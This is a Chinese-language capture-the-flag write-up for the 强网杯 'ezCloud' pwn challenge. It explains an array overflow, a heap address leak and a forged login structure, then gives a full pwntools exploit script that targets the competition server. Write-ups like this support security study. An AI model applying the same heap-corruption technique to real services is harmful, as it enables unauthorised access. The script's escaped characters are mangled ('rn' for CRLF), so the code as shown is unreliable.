强网杯 ezCloud题解

  • A+
所属分类:逆向工程

在比赛中代表星盟安全团队参赛的北极星队拿到了这道pwn题的一血

强网杯 ezCloud题解

EzCloud

notepad功能中存在一个数组溢出,可以将第17个位置的指针覆盖掉

强网杯 ezCloud题解

即可以覆盖LoginMsg指针,进而通过控制好堆布局,能够伪造一个登陆信息

强网杯 ezCloud题解

通过伪造LoginMsg的isLogined为1,即可解锁功能,通过/flag功能获得flag

同时,getMsg有可能不会初始化结构体,当a1->msgs2.buf为NULL时,进而可以通过悬挂的指针泄露堆里面的地址

强网杯 ezCloud题解

在parse解析的时候没有判断v9是否为0,因此可以得到size为0的Msg

强网杯 ezCloud题解

EXP

#coding:utf8
from pwn import *
#sh = process('./EzCloud')
sh = remote('47.94.234.66',37128)
def login(user):
   payload = 'POST /loginrn'
   payload += 'Login-ID: {}rn'.format(user)
   payload += 'rnrn'
   sh.send(payload)
   sh.recvuntil('Success!')
def logout(user):
   payload = 'POST /logoutrn'
   payload += 'Login-ID: {}rn'.format(user)
   payload += 'rnrn'
   sh.send(payload)
   sh.recvuntil('Success!')
def create_vm(name):
   payload = 'POST /createvmrn'
   payload += 'Login-ID: {}rn'.format(name)
   payload += 'rnrn'
   sh.send(payload)
def add_size0(user):
   payload = 'POST /notepadrn'
   payload += 'Login-ID: {}rn'.format(user)
   payload += 'Note-Operation: new%20notern'
   payload += 'Content-Length: {}rn'.format(0)
   payload += 'Content-Type: multipart/form-datarn'
   payload += 'rn'
   sh.send(payload)
   sh.recvuntil('Notepad operation done')
def add(user,content):
   payload = 'POST /notepadrn'
   payload += 'Login-ID: {}rn'.format(user)
   payload += 'Note-Operation: new%20notern'
   payload += 'Content-Length: {}rn'.format(len(content))
   payload += 'Content-Type: application/x-www-form-urlencodedrn'
   payload += 'rn'
   payload += content + 'rn'
   sh.send(payload)
   sh.recvuntil('Notepad operation done')
def delete(user,index):
   payload = 'POST /notepadrn'
   payload += 'Login-ID: {}rn'.format(user)
   payload += 'Note-Operation: delete%20notern'
   payload += 'Note-ID: {}rn'.format(index)
   payload += 'rn'
   sh.send(payload)
   sh.recvuntil('Notepad operation done')
def edit(user,index,content):
   payload = 'POST /notepadrn'
   payload += 'Login-ID: {}rn'.format(user)
   payload += 'Note-Operation: edit%20notern'
   payload += 'Note-ID: {}rn'.format(index)
   payload += 'Content-Length: {}rn'.format(len(content))
   payload += 'Content-Type: application/x-www-form-urlencodedrn'
   payload += 'rn'
   payload += content + 'rn'
   sh.send(payload)
   sh.recvuntil('Notepad operation done')
def show(user):
   payload = 'GET /notepadrn'
   payload += 'Login-ID: {}rn'.format(user)
   payload += 'rn'
   sh.send(payload)
def get_flag(user):
   payload = 'GET /flagrn'
   payload += 'Login-ID: {}rn'.format(user)
   payload += 'rn'
   sh.send(payload)
login('a')
add('a','a'*0x10)
delete('a',0)
#raw_input()
add('a','a'*0x10)
add('a','b'*0x10)
for i in range(5):
   add_size0('a')
add('a','a'*0x18)
show('a')
sh.recvuntil('b'*0x10)
sh.recvuntil('<p>')
heap_addr = u64(sh.recv(6).ljust(8,'x00'))
print 'heap_addr=',hex(heap_addr)
for i in range(8):
   add('a','c'*0x10)
#数组溢出,覆盖next指针
add('a','d'*0x10)
logout('a')
raw_input()
fakeLoginMsg_addr = heap_addr + 0x2e80
payload = 'hrnrn'
payload += 'h'*0x6
payload += p64(1) + p64(fakeLoginMsg_addr + 0x20) + p64(0x1) + p64(0x1)
payload = payload.ljust(0x6b,'h')
payload += p64(fakeLoginMsg_addr)
payload = payload.ljust(0x120,'h')
get_flag(payload)

sh.interactive()


本文始发于微信公众号(星盟安全):强网杯 ezCloud题解

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: